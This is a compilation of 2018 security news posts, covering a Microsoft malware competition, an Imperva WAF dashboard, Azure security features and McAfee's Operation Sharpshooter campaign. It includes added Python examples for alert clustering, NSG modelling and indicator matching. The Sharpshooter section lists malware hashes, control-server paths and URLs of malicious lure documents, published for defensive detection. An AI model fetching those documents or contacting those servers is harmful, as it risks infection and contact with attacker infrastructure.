We also believe in the power of working with the broader research community to stay ahead of threats. Microsoft’s 2015 malware classification competition on Kaggle was a huge success, with the dataset provided by Microsoft cited in more than 50 research papers in multiple languages. To this day, the 0.5TB dataset from that competition is still used for research and continues to produce value for Microsoft and the data science community. This new competition is organized by the Windows Defender ATP Research team, in cooperation with Northeastern University and Georgia Institute of Technology as academic partners, with the goal of bringing new ideas to the fight against malware attacks and breaches.

Kaggle is a platform for data scientists to create data science projects, download datasets, and participate in contests. Microsoft is happy to use the Kaggle platform to engage a rich community of amazing thinkers. We think this collaboration will result in better protection for Microsoft customers and the Internet at large. Stay tuned for the results; we can’t wait to see what the data science community comes up with!

Click here to join the competition.

Chase Thomas and Robert McCann
Windows Defender Research team

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Microsoft AI competition explores the next evolution of predictive technologies in security appeared first on Microsoft Secure.

British Teenager gets 3 year sentence for DDoS and False Bomb Threats

Recently, the Luton Crown Court sentenced a British teenager for sending out false bomb threats and carrying out DDoS attacks.

British Teenager gets 3 year sentence for DDoS and False Bomb Threats on Latest Hacking News.

Microsoft urges for Legal Framework to govern Facial recognition

Microsoft has reportedly sought for a reasonable legal framework for the deployment and use of facial recognition technology. While this

Microsoft urges for Legal Framework to govern Facial recognition on Latest Hacking News.

Deception technology: Authenticity and why it matters

This article is the second in a five-part series being developed by Dr. Edward Amoroso in conjunction with the deception technology team from Attivo Networks. The article provides an overview of the central role that authenticity plays in the establishment of deception as a practical defense and cyber risk reduction measure.

Requirements for authenticity in deception

The over-arching goal for any cyber deception system is to create target computing and networking systems and infrastructure that … More

The post Deception technology: Authenticity and why it matters appeared first on Help Net Security.

Can advancing cybersecurity techniques keep pace with new attack vectors in 2019?

A look back through a volatile 2018 has seen the cyber security landscape move towards an even more complex picture. This has been driven by the increased volume and diversity of threats and breaches, tools and network evolution. Security professionals have faced significant challenges in attack detection and mitigation, operating to the necessary policy and legal guidelines and growing teams with suitably-skilled personnel. None of these advances show any signs of slowing in 2019. However, … More

The post Can advancing cybersecurity techniques keep pace with new attack vectors in 2019? appeared first on Help Net Security.

Leveraging AI and automation for successful DevSecOps

As engineering teams try to innovate at a faster pace, being able to maintain the quality, performance and security of the applications become much more important. Organizations have found huge success in improving their overall product quality while ensuring security controls and compliance requirements are met. AI-driven automation solutions have aided engineering teams in automating key processes and leverage predictive analytics, to identify issues before they occur and taking corrective actions, improving the overall product … More

The post Leveraging AI and automation for successful DevSecOps appeared first on Help Net Security.

Hacking democracy efforts continue with upticks in malware deployments

Comodo Cybersecurity released its Global Threat Report 2018 Q3, offering insights from Comodo Threat Research Lab experts into key cyberthreat trends and the impact of malware on elections and other geopolitical events.

Hacking democracy and malware in conflict zones

The Comodo Q3 report also reveals disturbing upticks in malware deployment leading up to major national elections. Comodo Cybersecurity researchers document the impact of malware on elections in Russia, Turkey, Mali, Sierra Leone, Azerbaijan and Colombia. … More

The post Hacking democracy efforts continue with upticks in malware deployments appeared first on Help Net Security.

Read: New Attack Analytics Dashboard Streamlines Security Investigations

Attack Analytics, launched this May, aimed to crush the maddening pace of alerts that security teams were receiving. For security analysts unable to triage this avalanche of alerts, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigable incidents.  Powered by artificial intelligence, Attack Analytics is able to automate what would take a team of security analysts days to investigate and to cut that investigation time down to a matter of minutes.

Building upon the success of our launch, we are now introducing the Attack Analytics Dashboard. Aimed at SOC (Security Operations Center) analysts, managers, and WAF administrators, it provides a high-level summary of the types of security attacks hitting their web applications, helping to speed up security investigations and quickly zoom in on abnormal behaviors.

The WAF admin or the SOC can use the Dashboard to get a high-level summary of the security attacks that have happened over a period of time (the last 24 hours, 7 days, 30 days, 90 days or other customized time range):

  • Attack Trends: Incidents and events
  • Top Geographic Areas: Where attacks have originated
  • Top Attacked Resources
  • Breakdown of Attack Tool Types
  • Top Security Violations (Bad Bots, Illegal Resource Access, SQL injections, Cross-Site Scripting, etc.)

Events vs. incidents

Upon entering the Attack Analytics Dashboard, you can see the Incidents tab, which shows the attack trends across time, classified according to severity (critical, major and minor).  A quick scan allows you to understand if a sudden jump in incidents may deserve immediate attention.

In the Events tab, you can see the number of events vs. incidents which have occurred over a specific period of time. For example – the marked point in the graph shows that on October 4th there were 2,142 alerts that were clustered into 19 security incidents. If you want to understand what happened on this day, you can drill down and investigate these 19 incidents.

Next, you can see the Top Attack Origin countries which have attacked your websites over a specified period of time. This again could help identify any abnormal behavior from a specific country. In the snapshot below, you can see the “Distributed” incidents. This means that this customer experienced 4 distributed attacks, with no dominant country, and could imply the attacks originated from botnets spread across the world.

Top attacked resources

Top Attacked Resources provides a snapshot of your most attacked web resources by percentage of critical incidents and the total number of incidents. In this example, singular assets are examined as well as a distributed attack across the customer’s assets. In the 3rd row, you can see that the customer (in this case, our own platform) experienced 191 distributed attacks. This means that each attack targeted a few hosts under our brand name; for example, it may have been a scanning attack aimed at finding vulnerable hosts.

Attack tool types

A SOC Manager/WAF admin might also want to understand the type of attack tools that are being used.  In the example below, on the left, you see the distribution of incidents according to the tool types and on the right, you see the drill-down into the malicious tools, so you can better understand your attack landscape. Over the last 90 days, there were 2.38K incidents that used malicious tools. On the right we can see the breakdown of the different tools and the number of incidents for each one – for example, there were 279 incidents with a dominant malicious tool called LTX71.
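The dashboard figures above (2,142 alerts clustered into 19 incidents, "Distributed" incidents with no dominant country, top attacked resources, tool-type breakdowns) all derive from one step: grouping raw WAF events into incidents and then counting over the groups. The block below is an added illustration of that step, not Imperva's Attack Analytics code, whose clustering algorithm is not described on the page. It clusters constructed alert lines by attacked host, violation and tool, splits a cluster when alerts are more than 30 minutes apart, labels an incident "Distributed" when at least three sources contribute and no single country accounts for half the alerts, and then produces the counters the dashboard panels show. The gap, source-count and share thresholds, and the severity cut-offs, are assumptions chosen for the example.

```python
from collections import Counter
from datetime import datetime, timedelta

# Constructed WAF alerts, one per line:
# timestamp, source IP, source country, attacked host, violation, tool.
SAMPLE_ALERTS = """\
2018-10-04T10:00:01Z,203.0.113.5,US,shop.example.com,SQL Injection,sqlmap
2018-10-04T10:00:03Z,203.0.113.5,US,shop.example.com,SQL Injection,sqlmap
2018-10-04T10:00:09Z,203.0.113.5,US,shop.example.com,SQL Injection,sqlmap
2018-10-04T10:01:00Z,198.51.100.7,DE,shop.example.com,Cross-Site Scripting,browser
2018-10-04T10:02:00Z,198.51.100.8,BR,api.example.com,Illegal Resource Access,scanner
2018-10-04T10:02:10Z,198.51.100.9,IN,api.example.com,Illegal Resource Access,scanner
2018-10-04T10:02:20Z,198.51.100.10,FR,api.example.com,Illegal Resource Access,scanner
2018-10-04T10:02:30Z,198.51.100.11,JP,api.example.com,Illegal Resource Access,scanner
2018-10-04T12:00:00Z,203.0.113.5,US,shop.example.com,SQL Injection,sqlmap
"""

# Assumed clustering parameters: alerts with the same host/violation/tool
# closer together than GAP belong to one incident.
GAP = timedelta(minutes=30)
DISTRIBUTED_MIN_SOURCES = 3
DISTRIBUTED_MAX_TOP_SHARE = 0.5


def parse_alerts(text):
    rows = []
    for line in text.strip().splitlines():
        ts, ip, cc, host, violation, tool = line.split(",")
        rows.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "ip": ip,
                     "cc": cc, "host": host, "violation": violation, "tool": tool})
    return sorted(rows, key=lambda r: r["ts"])


def cluster_incidents(alerts, gap=GAP):
    """Fold a time-ordered alert stream into incidents (one dict per incident)."""
    open_incidents = {}  # (host, violation, tool) -> incident still being extended
    incidents = []
    for a in alerts:
        key = (a["host"], a["violation"], a["tool"])
        inc = open_incidents.get(key)
        if inc is None or a["ts"] - inc["last_seen"] > gap:
            inc = {"host": a["host"], "violation": a["violation"], "tool": a["tool"],
                   "first_seen": a["ts"], "last_seen": a["ts"], "alerts": 0,
                   "sources": Counter(), "countries": Counter()}
            incidents.append(inc)
            open_incidents[key] = inc
        inc["last_seen"] = a["ts"]
        inc["alerts"] += 1
        inc["sources"][a["ip"]] += 1
        inc["countries"][a["cc"]] += 1
    for inc in incidents:
        top_cc, top_n = inc["countries"].most_common(1)[0]
        spread = (len(inc["sources"]) >= DISTRIBUTED_MIN_SOURCES
                  and top_n / inc["alerts"] < DISTRIBUTED_MAX_TOP_SHARE)
        inc["origin"] = "Distributed" if spread else top_cc
        # Assumed severity cut-offs by alert volume.
        inc["severity"] = ("critical" if inc["alerts"] >= 4
                           else "major" if inc["alerts"] >= 2 else "minor")
    return incidents


def dashboard_summary(incidents):
    """The counters behind the dashboard panels: events vs incidents, origins, resources, tools."""
    return {
        "events": sum(i["alerts"] for i in incidents),
        "incidents": len(incidents),
        "by_severity": Counter(i["severity"] for i in incidents),
        "top_origins": Counter(i["origin"] for i in incidents),
        "top_resources": Counter(i["host"] for i in incidents),
        "tool_types": Counter(i["tool"] for i in incidents),
        "violations": Counter(i["violation"] for i in incidents),
    }


if __name__ == "__main__":
    incidents = cluster_incidents(parse_alerts(SAMPLE_ALERTS))
    for inc in incidents:
        print(inc["first_seen"], inc["host"], inc["violation"], inc["alerts"],
              inc["origin"], inc["severity"])
    print(dashboard_summary(incidents))
```

On the constructed input the nine alerts collapse to four incidents: the three sqlmap alerts at 10:00 form one "major" incident from US, the single XSS alert is a "minor" DE incident, the four scanner hits on `api.example.com` from four countries become one "critical" Distributed incident, and the sqlmap alert at 12:00 starts a fresh incident because it falls outside the 30-minute gap. The choice of gap and of the distributed threshold is what decides whether a slow scan appears as one incident or many, which is the knob an analyst tuning such a view cares about most.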

We think you’ll quickly discover the benefits which the new Attack Analytics Dashboard provides as it helps you pinpoint abnormal behaviors and speed up your security investigations. It should also assist you in providing other stakeholders within your company a high-level look at the value of your WAF.

And right now, we have even more dashboard insight enrichments in the works, such as:

  • False Positives Suspects: Incidents our algorithms predict to be highly probable of being false positives.
  • Community Attacks (Spray and Pray Attacks): Provide a list of incidents that are targeting you as part of a larger campaign – based on information gathered from our crowdsourced customer data.

Stay tuned for more!

The post Read: New Attack Analytics Dashboard Streamlines Security Investigations appeared first on Blog.

The evolution of Microsoft Threat Protection, December update

December was another month of significant development for Microsoft Threat Protection capabilities. As a quick recap, Microsoft Threat Protection is an integrated solution securing the modern workplace across identities, endpoints, user data, cloud apps, and infrastructure. Last month, we shared updates on capabilities for securing identities, endpoints, user data, and cloud apps. This month, we provide an update for Azure Security Center which secures organizations from threats across hybrid cloud workloads. Additionally, we overview a real-world scenario showcasing Microsoft Threat Protection in action.

Enhancing your infrastructure security using Azure Security Center

Azure Security Center is a sophisticated service designed to help organizations:

  • Understand their security state across on-premises and cloud workloads.
  • Find vulnerabilities and remediate quickly.
  • Limit exposure to threats.
  • Detect and respond swiftly to attacks.

With modern organizations now adopting hybrid ecosystems, securing the infrastructure across hybrid cloud workloads becomes more critical. Azure Security Center was developed to address the complexities of the modern infrastructure by helping strengthen your security posture and protect against threats to the infrastructure. Azure Security Center can now provide better visibility over an organization’s security state across virtual networks, subnets, and nodes by generating a topology map of the layout of each of these infrastructure components (Figure 1). As admins review the components of the network, Azure Security Center offers recommendations to help quickly respond to detected network issues. Additionally, Azure Security Center continuously analyzes the network security group (NSG) rules in the workload and presents a graph containing the possible reachability of every virtual machine (VM) in that workload.

Figure 1. Network topology map highlighting virtual networks, subnets, and nodes.

Another important enhancement is a new permissions model for Just in Time (JIT) VM access (Figure 2). Azure Security Center has lowered the privilege a user needs to successfully request JIT access to a VM from write to read, making it easier for customers to follow a least-privilege Role-Based Access Control (RBAC) model. JIT VM access is used to reduce the impact of brute force attacks that target management ports to gain access to a VM. If successful, an attacker can take control of the VM and establish a foothold in your environment. When JIT access is enabled, Azure Security Center locks down inbound traffic to Azure VMs by creating an NSG rule. Admins select the ports on the VM to which inbound traffic will be locked down; these ports are then controlled by the JIT solution. Previously, when a user requested access to a VM, Azure Security Center checked the user's RBAC permissions for write access on the VM; now the user needs only read access.

Figure 2. The Azure Security Center highlighting the JIT VM access feature.
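As an added illustration of the two mechanisms described above, the NSG reachability analysis and the JIT lockdown, here is a small Python model of inbound NSG evaluation. It is example code written for this page, not Microsoft's implementation. What it takes from Azure's documented behaviour is that rules are evaluated in ascending priority order, the first match decides, and the built-in AllowVnetInBound (65000) and DenyAllInBound (65500) rules close the list. The priorities it assigns to the JIT rules, the RFC 1918-only definition of the Internet tag, the 10.0.0.0/16 VNet address space and the three-hour approval window are assumptions, and the `weak`, `locked` and `approved` rule sets are constructed for the demo.

```python
"""Simplified model of Azure NSG inbound evaluation plus a JIT-style lockdown.

Added example for this page, not Microsoft's code. Assumptions are marked.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Assumption: anything outside RFC 1918 space counts as "Internet" here
# (the real Azure Internet tag is defined differently; this is a simplification).
_PRIVATE = [ipaddress.ip_network(p) for p in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Assumption: the VNet address space behind the VirtualNetwork tag.
VNET_PREFIX = ipaddress.ip_network("10.0.0.0/16")


@dataclass
class NsgRule:
    name: str
    priority: int                        # lower number wins; first match decides
    access: str                          # "Allow" or "Deny"
    protocol: str                        # "Tcp", "Udp" or "*"
    source: str                          # CIDR, "*", "Internet" or "VirtualNetwork"
    dest_port: str                       # "3389", "1000-2000" or "*"
    valid_until: Optional[float] = None  # JIT approvals are time-boxed


# Azure's built-in default inbound rules (real names and priorities); the
# AzureLoadBalancer rule is left out to keep the model short.
DEFAULT_INBOUND = [
    NsgRule("AllowVnetInBound", 65000, "Allow", "*", "VirtualNetwork", "*"),
    NsgRule("DenyAllInBound", 65500, "Deny", "*", "*", "*"),
]


def _source_matches(spec: str, src_ip: str) -> bool:
    addr = ipaddress.ip_address(src_ip)
    if spec == "*":
        return True
    if spec == "Internet":
        return not any(addr in net for net in _PRIVATE)
    if spec == "VirtualNetwork":
        return addr in VNET_PREFIX
    return addr in ipaddress.ip_network(spec, strict=False)


def _port_matches(spec: str, port: int) -> bool:
    if spec == "*":
        return True
    lo, _, hi = spec.partition("-")
    return int(lo) <= port <= int(hi or lo)


def first_match(rules, src_ip, port, protocol="Tcp", now=0.0) -> NsgRule:
    """Evaluate custom + default rules in priority order; return the deciding rule."""
    for rule in sorted(list(rules) + DEFAULT_INBOUND, key=lambda r: r.priority):
        if rule.valid_until is not None and now > rule.valid_until:
            continue  # an expired JIT approval no longer counts
        if (rule.protocol in ("*", protocol)
                and _source_matches(rule.source, src_ip)
                and _port_matches(rule.dest_port, port)):
            return rule
    raise AssertionError("DenyAllInBound matches everything")  # unreachable


def is_reachable(rules, src_ip, port, protocol="Tcp", now=0.0) -> bool:
    return first_match(rules, src_ip, port, protocol, now).access == "Allow"


# Assumption: JIT places its deny rule at 110 and each approval at 100, so an
# approval beats the deny and both beat ordinary customer rules (priority >= 100).
JIT_DENY_PRIORITY = 110
JIT_ALLOW_PRIORITY = 100


def jit_lockdown(rules, ports) -> List[NsgRule]:
    """Return a rule set with a deny rule in front of every chosen management port."""
    deny = [NsgRule(f"JIT-Deny-{p}", JIT_DENY_PRIORITY, "Deny", "*", "*", str(p)) for p in ports]
    return deny + list(rules)


def jit_approve(rules, requester_ip, port, now, duration_s=3 * 3600) -> List[NsgRule]:
    """Add a time-boxed allow for exactly one source address and one port."""
    allow = NsgRule(f"JIT-Allow-{port}", JIT_ALLOW_PRIORITY, "Allow", "Tcp",
                    f"{requester_ip}/32", str(port), valid_until=now + duration_s)
    return [allow] + list(rules)


def reachability(rules, sources, ports, now=0.0):
    """The per-VM reachability table Security Center draws, as a plain dict."""
    return {(s, p): is_reachable(rules, s, p, now=now) for s in sources for p in ports}


if __name__ == "__main__":
    # Constructed scenario: RDP opened to the whole Internet, then locked down by JIT.
    weak = [NsgRule("AllowRdpFromInternet", 300, "Allow", "Tcp", "Internet", "3389")]
    locked = jit_lockdown(weak, [22, 3389])
    approved = jit_approve(locked, "203.0.113.5", 3389, now=1000.0)
    for label, rs in (("weak", weak), ("locked", locked), ("approved", approved)):
        print(label, reachability(rs, ["203.0.113.5", "198.51.100.7"], [3389], now=1000.0))
```

The point the model makes is the one the paragraph makes: once the JIT deny rule is in front, an existing "allow RDP from anywhere" rule stops mattering, and an approval opens the port for a single source and a bounded time only; when the window passes, evaluation falls through to the deny rule again.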

Microsoft Threat Protection stops threats as envisioned

Security solutions always sound effective in theory, but in practice, often the capabilities do not match the vision. Microsoft Threat Protection was recently put to the test against a real-world threat known as Tropic Trooper (Figure 3), which has been targeting Asian enterprises in the energy and food and beverage industries since 2012.

Figure 3. Tropic Trooper attack chain.

Seamless integration between disparate services is a core differentiator of Microsoft Threat Protection. During the Tropic Trooper campaign, Windows Defender Advanced Threat Protection (ATP), Azure Active Directory (Azure AD), and Office 365 ATP services worked in sync, helping ensure the threat was addressed quickly with no adverse impact. The campaign initiated several Windows Defender ATP alerts triggering its device risk calculation mechanism, which ascribed affected endpoints with high risk scores. These endpoints were put to the top of the list in Windows Defender Security Center leading to early detection and discovery of the attack. Windows Defender ATP seamlessly integrates with Azure AD featuring conditional access. During Tropic Trooper, conditional access blocked high-risk endpoints from accessing sensitive content, protecting other users, devices, and data in the network.

The Windows team examined the alert timeline (Figure 4) to investigate further and ultimately remediate the threat. Investigating the alerts, the Windows team uncovered the malicious document carrying the Tropic Trooper exploit. Since signal is shared between Microsoft Threat Protection services, the Windows team used Office 365 Threat Intelligence's Threat Explorer to find the specific emails used to distribute the exploit. The investigation also showed that Office 365 ATP had blocked the malicious emails at the onset, closing the attack's entry point and protecting Office 365 ATP customers. Endpoints remained secure through Windows Defender ATP's automated investigation and remediation capabilities, which discovered malicious artifacts on affected endpoints and remediated them. This sequence of actions ensured that the attackers no longer had a foothold in the endpoint ecosystem and that all endpoints returned to a normal working state. Importantly, Microsoft Threat Protection services collectively secured identities, endpoints, and Office 365.

Figure 4. Windows Defender ATP alert timeline for Tropic Trooper.

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection. Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities. Begin trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

The post The evolution of Microsoft Threat Protection, December update appeared first on Microsoft Secure.

‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure

This post was written with contributions from the McAfee Advanced Threat Research team.  

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.

Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

Read our full analysis of Operation Sharpshooter.

Have we seen this before?

This campaign, while masquerading as legitimate industry job recruitment activity, gathers information to monitor for potential exploitation. Our analysis also indicates similar techniques associated with other job recruitment campaigns.

Global impact

In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis. Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest. The McAfee Advanced Threat Research team has observed that the majority of targets were defense and government-related organizations.

Targeted organizations by sector in October 2018. Colors indicate the most prominently affected sector in each country. Source: McAfee® Global Threat Intelligence.

Infection flow of the Rising Sun implant, which eventually sends data to the attacker’s control servers.


Conclusion

Our discovery of this new, high-function implant is another example of how targeted attacks attempt to gain intelligence. The malware moves in several steps. The initial attack vector is a document that contains a weaponized macro to download the next stage, which runs in memory and gathers intelligence. The victim’s data is sent to a control server for monitoring by the actors, who then determine the next steps.

We have not previously observed this implant. Based on our telemetry, we discovered that multiple victims from different industry sectors around the world have reported these indicators.

Was this attack just a first-stage reconnaissance operation, or will there be more? We will continue to monitor this campaign and will report further when we or others in the security industry receive more information. The McAfee Advanced Threat Research team encourages our peers to share their insights and attribution of who is responsible for Operation Sharpshooter.


Indicators of compromise

MITRE ATT&CK™ techniques

  • Account discovery
  • File and directory discovery
  • Process discovery
  • System network configuration discovery
  • System information discovery
  • System network connections discovery
  • System time discovery
  • Automated exfiltration
  • Data encrypted
  • Exfiltration over command and control channel
  • Commonly used port
  • Process injection

Hashes

  • 8106a30bd35526bded384627d8eebce15da35d17
  • 66776c50bcc79bbcecdbe99960e6ee39c8a31181
  • 668b0df94c6d12ae86711ce24ce79dbe0ee2d463
  • 9b0f22e129c73ce4c21be4122182f6dcbc351c95
  • 31e79093d452426247a56ca0eff860b0ecc86009

Control servers

  • 214.99.20/view_style.php
  • 74.41.56/board.php
  • com.sg/board.php

Document URLs

  • hxxp://208.117.44.112/document/Strategic Planning Manager.doc
  • hxxp://208.117.44.112/document/Business Intelligence Administrator.doc
  • hxxp://www.dropbox.com/s/2shp23ogs113hnd/Customer Service Representative.doc?dl=1

McAfee detection

  • RDN/Generic Downloader.x
  • Rising-Sun
  • Rising-Sun-DOC
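The indicators above are most useful when they are matched against your own evidence. The following Python script is an added example, not McAfee's tooling, that does that for two of the lists: it compares SHA-1 hashes from an EDR-style inventory or a directory walk against the five hashes published above, and it scans proxy log lines for the document host 208.117.44.112 and the three lure document names. The IoC values are copied from the post; the proxy log format, the sample log lines and the sample inventory are constructed for the demo.

```python
"""Match the Operation Sharpshooter indicators from the post against local evidence.

Added example for this page, not McAfee's code. IoC values come from the post;
the log format and sample data below are constructed.
"""
import hashlib
import os
import re
from typing import Dict, Iterable, List
from urllib.parse import unquote, urlsplit

# SHA-1 hashes from the post's "Hashes" list.
RISING_SUN_SHA1 = {
    "8106a30bd35526bded384627d8eebce15da35d17",
    "66776c50bcc79bbcecdbe99960e6ee39c8a31181",
    "668b0df94c6d12ae86711ce24ce79dbe0ee2d463",
    "9b0f22e129c73ce4c21be4122182f6dcbc351c95",
    "31e79093d452426247a56ca0eff860b0ecc86009",
}
# Host from the post's "Document URLs" list (hxxp:// defanging removed).
DOCUMENT_HOST = "208.117.44.112"
# Lure document file names from the same list.
LURE_DOC_NAMES = {
    "Strategic Planning Manager.doc",
    "Business Intelligence Administrator.doc",
    "Customer Service Representative.doc",
}


def sha1_of_file(path: str) -> str:
    """Stream a file through SHA-1 so large files do not have to fit in memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def match_hashes(inventory: Dict[str, str]) -> Dict[str, str]:
    """inventory maps a path to its SHA-1, as an EDR export would; returns the hits."""
    return {p: h.lower() for p, h in inventory.items() if h.lower() in RISING_SUN_SHA1}


def scan_directory(root: str) -> Dict[str, str]:
    """Hash every readable file under root and return those matching the IoC list."""
    inventory = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                inventory[path] = sha1_of_file(path)
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
    return match_hashes(inventory)


# Constructed proxy log format: "<timestamp> <client_ip> <method> <url> <status>"
_LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def match_proxy_log(lines: Iterable[str]) -> List[dict]:
    """Flag requests to the document host or for a known lure document name."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line.strip())
        if not m:
            continue
        ts, client, _method, url, _status = m.groups()
        parts = urlsplit(url)
        doc_name = unquote(parts.path.rsplit("/", 1)[-1])  # query string excluded
        reasons = []
        if parts.hostname == DOCUMENT_HOST:
            reasons.append("document host")
        if doc_name in LURE_DOC_NAMES:
            reasons.append("lure document name")
        if reasons:
            hits.append({"ts": ts, "client": client, "url": url, "reasons": reasons})
    return hits


# Constructed sample log: two requests built from URLs in the post, one benign.
SAMPLE_LOG = """\
2018-10-25T09:12:01Z 10.1.2.3 GET http://208.117.44.112/document/Strategic%20Planning%20Manager.doc 200
2018-10-25T09:12:05Z 10.1.2.3 GET https://www.example.com/index.html 200
2018-10-25T09:13:44Z 10.1.2.9 GET https://www.dropbox.com/s/2shp23ogs113hnd/Customer%20Service%20Representative.doc?dl=1 200
"""

if __name__ == "__main__":
    for hit in match_proxy_log(SAMPLE_LOG.splitlines()):
        print(hit)
    print(scan_directory("."))
```

Matching the lure by file name rather than by the Dropbox host keeps the check from flagging every Dropbox download, and hash comparison is case-insensitive because EDR exports are not consistent about hex case.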


The post ‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure appeared first on McAfee Blogs.

Securing and managing the enterprise Internet of Things

A future where the Internet of Things spreads exponentially is almost certain. Seemingly everybody wants these devices: consumers for the helpful features and manufacturers for the ability to collect data about the product and consumers’ use of it. Paul Calatayud, Palo Alto Networks’ CSO for the Americas, sees the IoT evolving into a new form of distributed computing powered by 5G and ever-increasing bandwidth speeds. The result will be intelligent, programmable devices that operate without … More

The post Securing and managing the enterprise Internet of Things appeared first on Help Net Security.

6.8% of the top 100,000 websites still accept old, insecure SSL versions

Mac-based malware has appeared on the list of the top ten most common types of malware for the first time in WatchGuard’s quarterly Internet security report. The Mac scareware appeared in sixth place in WatchGuard’s latest Q3 2018 report and is primarily delivered by email to trick victims into installing fake cleaning software. Researchers also found that 6.8 percent of the world’s top 100,000 websites still accept old, insecure versions of the SSL encryption protocol, … More

The post 6.8% of the top 100,000 websites still accept old, insecure SSL versions appeared first on Help Net Security.

Will sophisticated attacks dominate in 2019?

Trend Micro released its 2019 predictions report, warning that attackers will increase the effectiveness of proven attack methods by adding more sophisticated elements to take advantage of the changing technology landscape. “As we head into 2019, organizations must understand the security implications of greater cloud adoption, converging IT and OT, and increasing remote working,” said Greg Young, vice president of cybersecurity for Trend Micro. “Cybercriminals will continue to follow a winning formula – exploiting existing … More

The post Will sophisticated attacks dominate in 2019? appeared first on Help Net Security.

Professionally Evil Insights: Professionally Evil CISSP Certification: Breaking the Bootcamp Model

ISC2 describes the CISSP as a way to prove "you have what it takes to effectively design, implement and manage a best-in-class cybersecurity program". It is one of the primary certifications used as a stepping stone in your cybersecurity career. Traditionally, students have two different options to gain this certification: self-study or a bootcamp. Both of these options have pros and cons, but neither is the best.

Bootcamps are a popular way to cram for the certification test. Students spend five days in total immersion in the topics of the CBK. This is an easy way to pass the exam for lots of students because it focuses them on the CISSP study materials for the bootcamp timeframe. But there are a few negatives to this model. First is the significant cost. The typical prices we see are between $3,500 and $5,000, with outliers as high as almost $7,000. The second issue is that it takes the student away from their life for the week. Finally, most people finish the bootcamp with the knowledge to pass the exam, but since it is crammed in, they quickly forget most of the information.

Self-study is the other common mechanism for studying for the CISSP exam. This allows a dedicated student to learn the information at their own pace and time frame. It also allows them to decide how much to spend. From books to online videos and practice exams, the costs vary. The main problem with this method is that students often get distracted by life and work while trying to accomplish it.

But there is an answer that combines the benefits of both previous options. Secure Ideas has developed a mentorship program designed to provide the knowledge necessary to pass the certification while working through the common body of knowledge (CBK), all done in a manner that encourages retention of the knowledge. And it is #affordabletraining!

The mentorship program is designed as a series of weekly mentor-led discussion and review sessions, along with various student support and communication methods, spanning a total of 9 weeks. These work together to give the student a solid foundation that not only helps in passing the certification but continues as a collection of information for everyday work. This class is set up to cover the 8 domains of the ISC2 CBK:

  • Security and Risk Management
  • Asset Security
  • Security Architecture and Engineering
  • Communication and Network Security
  • Identity and Access Management (IAM)
  • Security Assessment and Testing
  • Security Operations
  • Software Development Security

The Professionally Evil CISSP Mentorship program uses multiple communication and knowledge sharing paths to build a comprehensive learning environment focused on both passing the CISSP certification and gaining a deep understanding of the CBK.

The program consists of the following parts:

  • Official study guide book
  • Weekly live session with instructor(s)
    • Live session will also be recorded
  • Private Slack team for students and instructors to communicate regularly
  • Practice exams
  • While we believe students will pass on their first try, we also include the option for students to take the program as many times as they want, any time we offer it.  🙂

You can sign up for the course over at https://attendee.gototraining.com/r/2538511060126445313 for only $1000.  Our early bird pricing is $800 and is good until January 31.  Just use the Coupon code EARLYBIRD at checkout.  Veterans, active duty military and first responders also get a significant discount.  Email info@secureideas.com for more information.


12 Days of Hack-mas

2018 was a wild ride when it came to cybersecurity. While some hackers worked to source financial data, others garnered personal information to personalize cyberattacks. Some worked to get us to download malware in order to help them mine cryptocurrency or harness our devices to join their botnets. And the ways in which they carry out their attacks are becoming more sophisticated and harder to detect. 2019 shows no sign of slowing down when it comes to attacks. Between the apps and websites we use every day, in addition to the numerous connected devices we continue to add to our homes, there are a lot of ways in which our cybersecurity can be compromised. Let's take a look at 12 common connected devices that are vulnerable to attacks, most of which our friends at the "Hackable?" podcast have demonstrated, and what we can do to protect what matters. This way, as we move into the new year, security is top of mind.

Connected Baby Monitors

When you have a child, security and safety fuels the majority of your thoughts. That’s why it’s terrifying to think that a baby monitor, meant to give you peace of mind, could get hacked. Our own “Hackable?” team illustrated exactly how easy it is. They performed a “man-in-the-middle” attack to intercept data from an IoT baby monitor. But the team didn’t stop there; next they overloaded the device with commands and completely crashed the system without warning a parent, potentially putting a baby in danger. If you’re a parent looking to bring baby tech into your home, always be on the lookout for updates, avoid knockoffs or brands you’re not familiar with, and change your passwords regularly.

Smart TVs

